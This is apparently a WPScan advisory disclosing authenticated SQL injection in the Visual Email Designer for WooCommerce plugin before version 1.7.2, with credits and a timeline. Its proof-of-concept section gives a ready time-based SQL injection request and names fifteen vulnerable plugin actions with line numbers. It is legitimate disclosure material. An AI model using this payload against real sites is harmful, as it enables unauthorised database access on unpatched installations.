WordPress Plugin Vulnerabilities
Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.
Proof of Concept
action={INSERT HERE NAME OF ACTION}&swcm_social_id=socialblockdrag_XpoeK&template_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template_id=2&theme_id=2&securekey=dd041b294f
Action: swcm_social_function ⇒ SQLi at line: 2725
Action: swcm_video_function ⇒ SQLi at line 2510
Action: swcm_footer_function ⇒ SQL at line 2311
Action: swcm_disclaimer_function ⇒ SQLi at line 2537
Action: swcm_image_function ⇒ SQLi at line 2621
Action: swcm_customer_function ⇒ SQLi at line 2940
Action: swcm_delete_widget = SQLi at line 3018
Action: swcm_hr_function = SQLi at line 2423
Action: swcm_maintext_function ⇒ SQLi at line 2339
Action: swcm_multi_image_function ⇒ SQLi at line 2653
Action: swcm_button_function ⇒ SQLi at line 2482
Action: swcm_title_function ⇒ SQLi at line 2596
Action: swcm_clone_widget ⇒ SQLi at line 3087
Action: swcm_order_function ⇒ SQLi at line 2994
Action: swcm_textarea_function ⇒ SQLi at line 2284
Affects Plugins
Fixed in 1.7.2 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Donato Di Pasquale & Francesco Marano
Submitter
Donato Di Pasquale & Francesco Marano
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-09 (about 1 years ago)
Added
2022-12-09 (about 1 years ago)
Last Updated
2022-12-09 (about 1 years ago)
WPScan 